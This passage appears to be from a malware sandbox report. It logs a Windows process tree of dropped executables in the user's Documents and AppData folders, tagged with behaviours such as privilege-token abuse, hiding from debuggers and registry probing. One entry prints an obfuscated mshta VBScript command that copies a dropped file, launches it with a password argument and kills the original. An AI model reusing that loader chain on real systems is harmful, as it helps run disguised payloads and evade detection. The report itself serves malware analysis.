        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:8820
- C:\Users\Admin\Documents\40Dbba5JzkHguF5BHFE7sdfW.exe
  "C:\Users\Admin\Documents\40Dbba5JzkHguF5BHFE7sdfW.exe"
  2⤵
  - Executes dropped EXE
  PID:1868
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 276
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4064
- C:\Users\Admin\Documents\r89nXplmqQE5PqLkZO2pCalF.exe
  "C:\Users\Admin\Documents\r89nXplmqQE5PqLkZO2pCalF.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- - C:\Users\Admin\AppData\Roaming\2885826.exe
    "C:\Users\Admin\AppData\Roaming\2885826.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3204
- - C:\Users\Admin\AppData\Roaming\1830006.exe
    "C:\Users\Admin\AppData\Roaming\1830006.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2464
- - C:\Users\Admin\AppData\Roaming\1359090.exe
    "C:\Users\Admin\AppData\Roaming\1359090.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5492
- - C:\Users\Admin\AppData\Roaming\2632684.exe
    "C:\Users\Admin\AppData\Roaming\2632684.exe"
    3⤵
    - Executes dropped EXE
    PID:988
- - C:\Users\Admin\AppData\Roaming\8843854.exe
    "C:\Users\Admin\AppData\Roaming\8843854.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4852 -s 2304
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5364
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4852 -s 2304
      4⤵
      Program crash
      PID:8264
- C:\Users\Admin\Documents\9igzZbIMLPjx5gchNZqBLVB2.exe
  "C:\Users\Admin\Documents\9igzZbIMLPjx5gchNZqBLVB2.exe"
  2⤵
  - Executes dropped EXE
  PID:1684
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 236
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5500
- C:\Users\Admin\Documents\yHiCplLxrI4T5LLnVx6XVlNj.exe
  "C:\Users\Admin\Documents\yHiCplLxrI4T5LLnVx6XVlNj.exe"
  2⤵
  - Executes dropped EXE
  PID:1636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 276
    3⤵
    - Program crash
    PID:4132
- C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe
  "C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"
  2⤵
  - Executes dropped EXE
  PID:1472
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\K881cE9ZARVUqncSaZBmTZq6.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )
    3⤵
    PID:3360
- C:\Users\Admin\Documents\6OUn4xmB6r0O7c3V5b7YH6lz.exe
  "C:\Users\Admin\Documents\6OUn4xmB6r0O7c3V5b7YH6lz.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
  "C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1448
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:3180
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2704
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:5340
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:5972
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:4488
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:3408
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1032
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5716
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4596
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5832
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2096
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6548
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6284
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7048
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5208
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6044
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4268
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7380
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7580
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8580
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5440
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8828
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6620
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1408
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7948
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:508
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9468
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10136
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9772
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9540
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8344
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9496
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6196
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:10172
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:400
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1312
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3844
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7840
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8604
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3424
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11168
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9992
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9956
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1424
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10424
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3168
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1624
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8288
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8012
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 28
      4⤵
      Program crash
      PID:8904
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4420
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8040
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11072
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9672
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11180
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7876
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8840
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11140
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3552
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10824
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2832
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3928
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:8356
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10460
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10348
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10656
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 28
      4⤵
      Program crash
      PID:7224
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5908
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10544
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7716
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8808
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8096
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3772
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6640
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 28
      4⤵
      Program crash
      PID:10644
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7804
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    PID:2704
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2732
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:344
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9472
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5156
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5144
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:3244
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11192
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1720
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7968
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9988
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6300
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10140
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10676
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5196
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7576
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10848
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10360
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5296
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:9740
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7860
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4404
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8120
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8348
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5544
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:6936
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:8696
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2576
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7172
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7468
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:11508
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12056
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12840
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12564
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13056
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:7676
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12820
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13164
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:5264
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7864
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:12848
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:10408
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:7940
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:1316
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:2352
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:4712
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13600
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:14160
- - C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    C:\Users\Admin\Documents\W3SGPRNzsnviCFwyWGjWU3KW.exe
    3⤵
    PID:13740
